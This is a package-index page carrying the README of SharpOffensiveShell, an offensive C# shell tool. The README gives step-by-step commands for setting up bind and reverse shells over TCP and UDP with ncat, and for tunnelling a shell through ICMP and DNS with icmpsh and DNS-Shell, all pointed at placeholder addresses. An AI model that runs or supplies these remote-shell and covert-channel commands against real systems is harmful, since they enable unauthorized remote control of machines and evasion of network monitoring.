Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/darkr4y/sharpoffensiveshell
A sort of simple shell which support multiple protocols.
https://github.com/darkr4y/sharpoffensiveshell
csharp dns icmp reverse-shell
Last synced: 3 months ago
JSON representation
A sort of simple shell which support multiple protocols.
- Host: GitHub
- URL: https://github.com/darkr4y/sharpoffensiveshell
- Owner: darkr4y
- Created: 2019-09-04T03:36:54.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2019-09-04T03:37:56.000Z (over 5 years ago)
- Last Synced: 2023-08-06T23:41:39.263Z (over 1 year ago)
- Topics: csharp, dns, icmp, reverse-shell
- Language: C#
- Homepage:
- Size: 4.88 KB
- Stars: 88
- Watchers: 6
- Forks: 22
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# SharpOffensiveShell
A sort of simple shell which support multiple protocols.
This project is just for improving my C# coding ability. The SharpOffsensiveShell DNS mode use the Native Windows API instead of the Nslookup command to perform DNS requests.
## QuickStart
SharpOffsensiveShell support .NET Framework 2.0
```
csc SharpOffensiveShell.cs
```## TCP
**For bind shell**
```
sharpoffensiveshell.exe tcp listen 0.0.0.0 8080
``````
ncat -v 1.1.1.1 8080
```**For reverse shell**
```
ncat -lvp 8080
``````
sharpoffensiveshell.exe tcp connect 1.1.1.1 8080
```## UDP
**For bind shell**
```
sharpoffensiveshell.exe tcp listen 0.0.0.0 8080
``````
ncat -u -v 1.1.1.1 8080
```**For reverse shell**
```
ncat -u -lvp 8080
```When reverse connection accepted, type enter to make prompt display.
```
sharpoffensiveshell.exe tcp connect 1.1.1.1 8080
```## ICMP
```
git clone https://github.com/inquisb/icmpsh
sysctl -w net.ipv4.icmp_echo_ignore_all=1
cd icmpsh && python icmpsh-m.py listenIP reverseConnectIP
``````
sharpoffensiveshell.exe icmp connect listenIP
```## DNS
```
pip install dnslib
git clone https://github.com/sensepost/DNS-Shell
```**For direct mode**
```
python DNS-Shell.py -l -d [Server IP]
sharpoffensiveshell.exe dns direct ServerIP Domain
```**For recursive mode**
```
DNS-Shell.py -l -r [Domain]
sharpoffensiveshell.exe dns recurse Domain
```